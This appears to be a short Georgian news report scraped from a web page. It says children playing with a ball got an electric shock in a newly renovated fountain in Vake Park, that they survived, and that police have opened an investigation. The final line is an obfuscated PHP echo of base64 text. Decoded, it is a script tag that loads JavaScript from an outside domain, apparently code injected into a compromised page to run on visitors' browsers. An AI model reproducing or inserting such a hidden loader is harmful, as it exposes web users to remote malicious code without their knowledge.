celsiusi
ავერსი საქკაბელი
ახლად რეაბილიტირებულ ვაკის პარკში, შადრევანში ჩასულ ბავშვებს დენმა დაარტყა. თვითმხილველები ყვებიან, რომ ბავშვები ბურთით თამაშობდნენ, რომელიც აუზში ჩავარდა. თავდაპირველად შადრევანში ორი ბავშვი ჩავიდა, ორივე მათგანს თვითმხილველთა თქმით, დენმა დაარტყა, მათ დასახმარებლად ადგილზე მესამე ბავშვიც მივიდა. 
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს მერიის პრესამსახურში განუცხადეს, დაშავებულებს დახმარება სასწრაფომ გაუწია, საბედნიეროდ ბავშვები გადარჩნენ. დეტალების დაზუსტება მიმდინარეობს. 
 
მათივე ცნობით, შინაგან საქმეთა სამინისტრომ მომხდარზე გამოძიება უკვე დაიწყო, 
 
ცნობისთვის, ვაკის პარკში არსებული მცირე კასკადისა და მრგვალი შადრევნის რეაბილიტაცია გუშინ დასრულდა.
 
 
 
371
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");